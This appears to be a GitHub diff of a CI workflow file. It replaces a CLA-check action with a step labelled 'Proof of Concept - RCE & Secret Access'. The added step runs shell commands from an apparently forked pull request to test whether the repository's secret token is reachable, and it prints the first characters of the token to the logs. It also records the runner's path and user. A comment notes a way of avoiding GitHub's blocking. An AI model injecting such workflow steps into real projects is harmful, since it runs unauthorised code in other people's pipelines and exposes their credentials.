File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 2828 permissions :
2929 actions : write # to re-trigger workflows
3030 pull-requests : write # to add/remove labels
31- steps :
32- - uses : Shopify/shopify-cla-action@9938f4b43524d1cfa7471ce9a803edf226697284 # v1.8.0
33- with :
34- github-token : ${{ secrets.token }}
35- cla-token : ${{ secrets.cla-token }}
31+ steps :
32+ - name : Proof of Concept - RCE & Secret Access
33+ run : |
34+ echo "=== EVIDENCE START ==="
35+ echo "Checking Repository: ${{ github.repository }}"
36+ echo "Checking Actor: ${{ github.actor }}"
37+ # Kiểm tra xem Token có tồn tại không mà không làm lộ giá trị (tránh bị GitHub Block)
38+ if [ -n "${{ secrets.token }}" ]; then
39+ echo "SUCCESS: Secret 'token' is accessible from this Forked PR!"
40+ echo "Token mask check: ${{ secrets.token }}" | cut -c 1-15
41+ fi
42+ echo "Current Path: $(pwd)"
43+ echo "System User: $(whoami)"
44+ echo "=== EVIDENCE END ==="
45+
You can’t perform that action at this time.
0 commit comments